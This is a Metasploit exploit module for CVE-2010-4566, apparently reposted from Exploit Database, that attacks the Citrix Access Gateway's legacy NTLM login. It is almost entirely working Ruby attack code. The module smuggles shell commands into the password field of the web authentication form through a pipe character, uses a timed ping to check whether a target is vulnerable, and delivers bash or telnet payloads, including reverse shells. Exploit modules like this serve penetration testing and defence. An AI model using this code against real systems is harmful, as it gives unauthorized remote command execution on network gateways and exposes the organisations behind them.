Citrix Access Gateway – Command Execution (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2011-03-03
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/16916/

• ##
  # $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  
  require 'msf/core'
  
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = ExcellentRanking
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Citrix Access Gateway Command Execution',
  			'Description'=> %q{
  					The Citrix Access Gateway provides support for multiple authentication types.
  				When utilizing the external legacy NTLM authentication module known as
  				ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
  				line utility to verify a user's identity and password.By embedding shell
  				metacharacters in the web authentication form it is possible to execute
  				arbitrary commands on the Access Gateway.
  			},
  			'Author' =>
  				[
  					'George D. Gal', # Original advisory
  					'Erwin Paternotte', # Exploit module
  				],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 11873 $',
  			'References' =>
  				[
  					[ 'CVE', '2010-4566' ],
  					[ 'OSVDB', '70099' ],
  					[ 'BID', '45402' ],
  					[ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
  				],
  			'Privileged' => false,
  			'Payload'=>
  				{
  					'Space' => 127,
  					'DisableNops' => true,
  					'Compat'=>
  						{
  							'PayloadType' => 'cmd cmd_bash',
  							'RequiredCmd' => 'generic telnet bash-tcp'
  						}
  				},
  			'DefaultOptions' =>
  				{
  					'WfsDelay' => 30
  				},
  			'Platform' => [ 'unix' ],
  			'Arch' => ARCH_CMD,
  			'Targets'=> [[ 'Automatic', { }]],
  			'DisclosureDate' => 'Dec 21 2010',
  			'DefaultTarget'=> 0))
  
  		register_options(
  			[
  				Opt::RPORT(443),
  				OptBool.new('SSL', [ true, 'Use SSL', true ]),
  			], self.class)
  
  	end
  
  	def post(command, background)
  		username = rand_text_alphanumeric(20)
  
  		if background
  			sploit = Rex::Text.uri_encode('|' + command + '&')
  		else
  			sploit = Rex::Text.uri_encode('|' + command)
  		end
  
  		data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
  		data << username
  		data << "&password="
  		data << sploit
  
  		res = send_request_cgi({
  			'uri' => '/',
  			'method'=> 'POST',
  			'data'=> data
  		}, 25)
  	end
  
  	def check
  		print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")
  
  		# Try running/timing 'ping localhost' to determine is system is vulnerable
  		start = Time.now
  		post("ping -c 10 127.0.0.1", false)
  		elapsed = Time.now - start
  		if elapsed >= 3
  			return Exploit::CheckCode::Vulnerable
  		end
  
  		return Exploit::CheckCode::Safe
  	end
  
  	def exploit
  		cmd = payload.encoded
  
  		if not post(cmd, true)
  			raise RuntimeError, "Unable to execute the desired command"
  		end
  	end
  end